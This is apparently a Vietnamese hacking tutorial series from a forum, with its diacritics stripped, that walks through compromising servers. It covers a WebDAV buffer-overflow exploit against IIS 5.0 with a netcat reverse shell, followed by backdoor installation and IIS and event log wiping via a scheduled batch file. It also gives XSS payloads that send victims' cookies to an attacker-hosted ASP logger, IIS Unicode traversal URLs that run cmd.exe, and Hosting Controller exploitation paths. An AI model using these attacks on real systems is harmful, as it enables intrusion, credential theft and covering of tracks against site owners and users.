Web nm th mc vinetpub\wwwroot , cc bn vo c rI th ch cn thay index.html vI tn hack by . L c ri , ng quy h nh . GOOKLUCK!!!!!!!!!!!!!!! ( Ht phn 8 ) Bi vit ca ANHDENDAY

y l phn 9 50 . ) K thut hack server thng qua li trn b m WebDAV : _ Gii thiu : Giao thc World Wide Web Distributed Authoring and Versioning (WebDAV) l mt tp hp cc m rng cho giao thc HTTP dng cung cp mt cch thc chun cho vic bin tp v qun l file gia cc my tnh trn Internet. Li trn b m c pht hin trong mt thnh phn ca Windows 2000 c s dng bi WebDAV c th cho php k tn cng chim quyn iu khin my tnh . _ Chun b : Ngoi nhng ngh gii thiu cc bi trc , cc bn hy vo down thm www32.brinkster.com/anhdenday/wb.zip extract trong C:\ _ Khai thc : + Tm mt trang Web dng IIS 5.0 + Vo Dos , vo t NETCAT ch lng nghe : CODE C:\>nx -vv -l -p 53 listening on [any] 53 ... Ta n lng nghe cng 53 v tng la ko chn cng ny . + M thm mt ca s DOS na . + Ta s dng WebDAV va down v . c:\wb.exe <IP ca my ch IIS> <IP ca my tnh ca mnh dng tn cng> <cng lng nghe> [padding=1,2,3...] VD : CODE C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] www.coromputer.net && undernet #coromputer Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND exploiting ntdll.dll through WebDav [ret: 0x00100010] Connecting... CONNECTED Sending evil request... SENT Now if you are lucky you will get a shell. + Nu nh may mn bn c th ly c shell ca my ch IIS . Nu nh my tnh dng tn cng hin ra kt qu nh sau th bn c shell ri : CODE C:\>nc -vv -l -p 53 listening on [any] 53 ... connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> <-- OK thnh cng ri. :mellow: :mellow: :mellow: + Khi c shell ri vic u tin l ta s dng cc lnh trong Unix khai thc , sau up ln server vi con backdoor , he he . ( S dng con WinShell, Hack Defensed l ok ri ) . + Sau khi lm xong ta s xo file log , xc nh file log ta thc hin cu truy vn sau : CODE C:\WINNT\system32>reg query HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Paramete rs /v LogFileDirectory ! REG.EXE VERSION 2.0

kt qu n s xut hin link ta xc nh file log : CODE HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ W3SVC\Parameters LogFileDirectory REG_SZ C:\WINNT\System32\LogFiles He he , ng dn file log l C:\WINNT\System32\LogFiles + Ta to mt file a.bat trn my ca nn nhn thc hin vic xo file log ny , ta nh cc lnh sau : CODE C:\WINNT\system32>echo iisreset /stop >a.bat ' tm dng server IIS C:\WINNT\system32>echo rd /q /s C:\WINNT\System32\LogFiles >>a.bat ' xa nht k ca IIS C:\WINNT\system32>echo iisreset /start >>a.bat ' khi ng li IIS C:\WINNT\system32>echo ce >>a.bat ' xa nht k ca Event Log C:\WINNT\system32>echo del a.bat >>a.bat ' xa file a.bat + Sau ta dng cc lnh sau cho flie a.bat kia lm vic : CODE C:\WINNT\system32>net time \xxx.xxx.xxx.xxx ' ly thi gian hin ti ca my ch N s cho kt qu nh VD sau : CODE Current time at \xxx.xxx.xxx.xxx is dd/mm/yy 3:00 PM

The command completed successfully . Nh vy thI gian hin tI trn my ch l 15:00 , ta s cho file a.bat lm vic sau 5 pht na bng lnh sau : CODE C:\WINNT\system32>at 15:05 a.bat Added a new job with job ID = 1 Ta c th mc inh cho file a.bat t ng lm vic sau bao lu l tu vo thng s thi gian bn a vo . Ta thot khi my ch bng lnh : CODE C:\WINNT\system32>exit ' ng kt ni sent 207, rcvd 746 + Lc ny th my admin c ti thnh cng ko bit l c ngi thm nhp. _ Sau ny cc bn mun quay li ci server trn th ta t nhp trc tip thng qua backdoor cc bn up ln. _ Km theo file Wb.exe ti thm 2 file na l : + xoafilelog.exe : dng xo file log trong server ca victim . + wbscaniis.xpn : dng qut xem server victim c b li ny cho ta khai thc hay khng , cc bn t tm hiu s dng chng nh. ( Tham kho t bi vit ca seamoun ) 51 . ) Li CROSS SITE SCRIPTING v cch khai thc : _ Gii thiu : Li XSS ( tn gi ca Cross-Site Scripting ) ni nm na l hacker c th thng qua li ny chn code vo site hay link chm cc thng tin quan trng t nn nhn,

cc thng tin quan trng y c th l cookie hoc username + pass vo ti khon 1 ngn hng no sau thng tin ny c gi ti cho hacker . _ Chun b : + Ly on code sau save li thnh file cookie.asp ri up ln host ca bn c h tr asp ( nh brikster.com ) : CODE <% Set x = CreateObject("Scripting.FileSystemObject") Set y = x.OpenTextFile(Server.MapPath("mask.txt"), 8, true) y.WriteLine Request.QueryString("cookie") y.Close Set y = Nothing Set x = Nothing %> _ Kim tra trang Web b li : + 1 site bt k bao gi cng c 1 hoc tt c cc phn sau : search results, error messages , Web-form , ch yu li XSS nm cc phn ny , ni chung l XSS c th xy ra ch no m ngi dng c th nhp d liu vo v sau s nhn c 1 ci g . + Cch tm li ta chia thnh 4 bc : Bc 1 : M website cn kim tra . Bc 2 : Bt u kim tra , nh v 1 tm kim hoc 1 login form v gi thng tin i (nhp thng tin v nhn submit hay login hay ok g ) , v d nhp ch "abc" chng hn hay ch g cng c . Bc 3 : Xc nh kh nng site c b li XSS hay khng bng cch xem thng tin tr v : V d bn thy nh th ny : "Your search for 'abc' did not find any items" "Your search for 'abc' returned the following results" "User 'abc' is not valid" "Invalid login 'abc'" hoc l ci g m c dnh ti ch "abc" m bn nhp vo

ban u th 99% thng ny bi XSS Bc 4 : Chn code thc s vo ni b li : chn ci ny : <script>alert('abc')</script> vo ban ny v nhn SUBMIT . Nu sau bn nhn c 1 popup c ch "abc" th thng ny 100% b dnh XSS . Nhng xin ch , thnh thong vn c trng hp website b dnh XSS nhng vn khng xut hin ci popup th buc lng bn phi VIEW SOURCES n ra xem . Khi view sources nh kim dng ny<script>alert('abc')</script> , nu c th XSS y ri . Mt v d khc thng gp hn : Gi http://sitebiloi.com l site b dnh li XSS v ta tm c ni b li nh th ny : ..." target=_blankhttp://sitebiloi.com/?page=<script>...<script > , ngha l ta c th chn code ngay trn thanh ADDRESS . Ti khng th trnh by ht mi tnh hung c , ci m cc bn cn l hiu ra vn th bn s hiu c khi no b li . _ Khai thc : + Ly li v d site b XSS trn thanh address , ly cookie ca nn nhn ta lm nh th ny : http://sitebiloi.com/index.asp?page=<script>window.open(" http:// a ch trang Web ta va up file cookie. asp ln /cookie.asp?cookie="+document.cookie)</script> th ngay lp tc on code c chn vo trong web page , v trng nh vy : CODE ----------------------------------------------------------<HTML> <TITLE> Hello all! </TITLE> hello <script>window.open("a ch trang Web ta va up file cookie.asp ln

/cookie.asp?cookie="+document.cookie)</script> ... </HTML> -------------------------------------------------------------Vi on code ny th trnh duyt s thi hnh on code v sau s gi ton b cookie ti cho bn dng file .txt v bn ch vic m file ny ra xem . + Vy gp trng hp nh qun tr hn ch s xm nhp bng cch lc b cc k t c bit ta phi lm sao ? Cc bn th cch thay th cc k t bng cc m i din . VD : * Nu "B lc" loi b 2 k t "<" v ">" : Hacker s dng "\x3c" v "\x3e" thay th v bt u chn code vi ') + ') + '\x3cscript src=http://hostbanupfile.com/cookie.asp?cookie="+docume nt.cookie\x3e\x3c/script\x3e' tm hiu thm v m i din cc bn hy download ti : www32.brinkster.com/anhdenday/ascii.zip v nghin cu . + Bin cc on code nguy him thnh li ch gii (comment) : V d khi hacker nhp vo <script>code</script> th s b chn nh sau : CODE <COMMENT> <!-code (khng c phn tch bi b lc) //--> </COMMENT>

Vt qua ci ny cng rt d bng cch dng th ng </COMMENT> ng ci <COMMENT> kia . Ngha l ta chn ci ny vo : <script> </COMMENT> <img src="http://none" onerror="alert(abc was here);window.open( http://sitebanupfile.com/cookie.asp?cookie...cument.cookie) ; "></script> lc ny on lc code ban u tr thnh : <COMMENT> CODE <!-- --> </COMMENT> <img src="h*tp://none" onerror="alert(abc was here);window.open( http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); "> </script> </COMMENT> v th l b lc b v hiu ho 1 cch nhanh chng . ( Da theo bi vit ca Mask_NBTA ) 52 . ) Tm hiu v l hng Unicode trong Microsoft IIS : _Gii thiu: Microsoft IIS l mt phn mm web server. N cha tt c file ca mt website, v lm chng c hiu lc cho mi ngi dng trn internet. Nhng nh tt c cc phn mm khc, (c bit l ca Microsoft) n c l hng

bo mt Unicode trong IIS ca Microsoft, nhng "khng may" nhng ngi qun tr th li khng quan tm n vic ci t nhng patch fix li . Trong bi hng dn ny, ta tho lun v cch m li ny hot ng, v Ti sao n hot ng c. Khi bn ving thm mt website, a ch ca file bn hin gi ang xem s ging nh sau: http://www.someserver.com/ y l remote address ca web server, hin th trn thanh address ca trnh duyt. Bt k ai cng c th truy cp n trn internet. Khi vo site ny, web server s a cho bn file index, (index.html hay ) ca root folder web server. Hu ht nhng root folder ca mt web server l: C:\inetpub\wwwroot y l th mc local ca web servers, ni ct gi tt c cc trang chnh ca website. V vy nu bn g a ch sau: http://www.someserver.com/index.html trnh duyt, web server s a cho bn local file ca n: c:\inetpub\wwwroot\index.html Ti hy vng bn s khng qu nhm chn, vic quan trng nht l bn phi hiu c s khc nhau gia a ch local v remote. By gi, ci g s xy ra nu ta mun di chuyn mt cp th mc ln web server? Ta mun di chuyn t c:\inetpub\wwwroot n c:\ chng ta s lm nh th no? Bn khng th g: http://www.someserver.com/c:\

Ch thch Web server s bt u i qua local ca n c:\inetpub\wwwroot i vi nhng th mc ring, v do bn khng th c : trong th mc, n s v v bn nhn c thng bo li trong trnh duyt. Tic qu! n khng hot ng. Nu quen vi FTP, th bn cng bit lnh DIRUP dng lm g. Lnh i n mt th mc trn l /../ Nu bn thit k bt k web hay m html no th chc chn bn s dng c rt nhiu. V th ta ch t lnh ln nhau, ging nh sau http://www.someserver.com/../../ V bt u truy cp vo a c local ca server? Tt, ta bt u khai thc y, nhng ngi to IIS li mun trnh phin phc, bng cch lm server t chi loi yu cu ny.V th ta phi lm g y?Bn c bao gi th download mt file m trong tn ca n c khong trng cha? Bn c nhn c thng bo l trnh duyt bin i khong trng thnh %20 khng? Hy lm 1 v d. Nu bn g ci ny trong trnh duyt: http://www.someserver.com/iis Unicode hole.txt Trnh duyt s thay th khong trng bng %20 : http://www.someserver.com/iis%20unicode%20hole.txt V sau mi cho php bn download file. l ci g, v ti sao trnh duyt li phi lm nh th? My tnh khng th hiu c khong trng. n gin l

chng khng lm c vy thi. %20 y chnh l Unicode cho k t ASCII m ta hay gi l khong trng. K t ASCII l nhng k t m ta thy trn mn hnh khi dng my tnh. Ch c mt Unicode cho mi k t ASCII. V th, khi bn a mt khong trng vo trnh duyt, n phi c thay th bng ci g m cho my tnh c th hiu c trc khi n bt u tm kim. tm hiu thm v ASCII cc bn down ti : www32.brinkster.com/anhdenday/ascii.zip T khi trnh duyt bin i khong trng thnh k t Unicode mi v gi chng n web server m c th hiu c, ta cng c th dng k t Unicode gii thch bt c th g ta mun, v web server s cng hiu c chng. Khng ch vi khong trng. M ta cng c th bin i lnh DIRUP thnh Unicode, v gi chng n server. Ta cn bin i du gch cho (/) thnh /../../ trong Unicode. Unicode ca / l %5C . Tht l tuyt, nu sau ti ch cn g http://www.someserver.com/..%5C.. %5C/ v ti c th thy host c khng? Khai thc y, nhng c mt vi l do n khng hot ng. u tin, nu bn lm vi servers local c:\ Bn s cn mt vi th ng th mc. Web server s khng lm nh vy cho bn. V vy chng ta cn m cmd.exe (du nhc DOS) ca server. Trong trnh duyt ca bn! Nhng chng ta s quay li vn ny sau. Th hai, khi server gii m /..%5C.. %5C/ N s thnh /../../ m li b hn ch, v sau t chi yu cu. V th ta cn phi lm g, hay m ho Unicode m ha ri mt ln na. C th bn s khng theo ti ngay by gi, nhng ti s c gng gii thch mt ln na. Ta cn m ho mi k t ca chui Unicode c. Xem bng di s hiu hn.

CODE [COLOR=purple]ASCII................................. UNICODE[/COLOR] %........................................ %25 5.......................................... %35 C............................ .............%43 V vy khi ta m ha k t ASCII /..%5C.. %5C/ Sang Unicode, ta c ..%25%35%43..%25%35%43 V khi server c chui k t ny, n s tr lI /..%5C.. %5C/ khng phi l lnh DIRUP bnh thng, nn n c cho php. Nhng c mt vi th chng ta cn bit. Nh ti cp trc, khi bn kt ni n mt web server, th mc root mc nh l wwwroot. Th mc ny nhng trang chnh ca site. Nhng c nhng th mc khc cho nhng trang web nh yu t scripts. Nhng th mc ny c cha file m c kh nhiu th quan trng trong web server. V vy khi vn dng server, ta cn lm n t th mc m ta c c quyn lm. iu ny khng kh; Ti ch mun bn hiu ti sao ti thm /scripts/ vo cui URL. Rt cuc, khi ta thi hnh lnh du nhc servers local dos prompt, ta cn thi hnh mt lnh cng trong ci ny. Ta mun hin th c:\ ? D thi; ta ch cn lm vi th thut khc hn bn thng lm du nhc dos. Bt u cmd.exe theo cch sau: cmd.exe?/c+ ? = Mi th sau dng i s ca lnh. /c = Thi hnh lnh, sau ng cmd.exe ( cho n khng chy mi) + = Thay th cho khong trng

Cui cng, ton b lnh rp li s nh sau: http://www.myserver.com/scripts/..%25%35%43..%25%35 %43/winnt/system32/cmd.exe?/c+dir+c:\ V bn thy c c:\ ca servers bn trong trnh duyt. Hehe? _ Ch thch: C rt nhiu lnh Unicode khc cho ta thi hnh, nu ci ny khng hot ng (c th server fix c phn no) th th p dng nhng cch sau: CODE /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ cmd.exe?/c+dir+C:\ /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../ winnt/system32/cmd.exe?/c+dir+C:\ . ( Mt bi vit rt cht lng ca LeonHart bn www.whatvn.com ) 53 . ) K thut hack Hosting controller : _Tm site b li : vo Google.com nh vo mt trong cc t kho sau : + copyright Hosting Controller . + allinurl:/advadmin . + allinurl:/admin . Sau khi tm c ta th xt trang Web c b li hay ko bng cch s dng 2 on code : CODE http://www.victim.com/advwebadmin*hoac admin*/stats/statsbrowse.asp?filepath=c:\&Opt=3 ( Lnh ny xem a ca victim )

www.victim.com/advwebadmin/autosignup/newwebadmin.as p ( Lnh ny to mt free hosting ) Nu nh 2 lnh trn cng thc hin c th ta c th khai thc chng c ri , he he . _ Cch khai thc : + V to c hosting nn ta c th upload c file v t , cc bn hy ch th xem a ch m ct cc file ta va upload ln u ( bng cch nhn vo thanh statup ) . + Tip theo l ta lm sao chuyn ci file vo th mc cha trang ch ca nn nhn , theo mc nh n s nm y : C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\ ( Cc bn c th thay C:\ bng D:\ , E:\ ) + Khi xc nh c chnh xc a ch ri ta s tm on script lm gip : http://[targethost]/admin/import/imp_rootdir.asp?result=1& www=C:\&ftp=C:\( ng dn n th mc web victim )&owwwPa th=C:\&oftpPath=C:\( ng dn n th mc ta va upload file ) + Cc bn c th test ng dn file up ln c chnh xc khng bng cch up ln file a.html bt k , gi s n c up ln nm C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html ta s test bng cch nh ng dn URL : www.victim/admin[avdadmin]/a.html + Nu nh ng l chnh xc ri th ch cn up ngh ln

l xong , . --------------------------------------------------------------------------------------------GOODLUCK!!!!!!!!!!!!!!!!! ( Ht phn 9 ) Bi vit ca ANHDENDAY

type lnh th phi type cho ng, tp cn thn cho quen i nh/ netstat -option ( vi options l g th type netstat -help) netstat -help Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports. -e Displays Ethernet statistics. This may be combined with the -s option. -n Displays addresses and port numbers in numerical form. -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval Redisplays selected statistics, pausing interval

seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.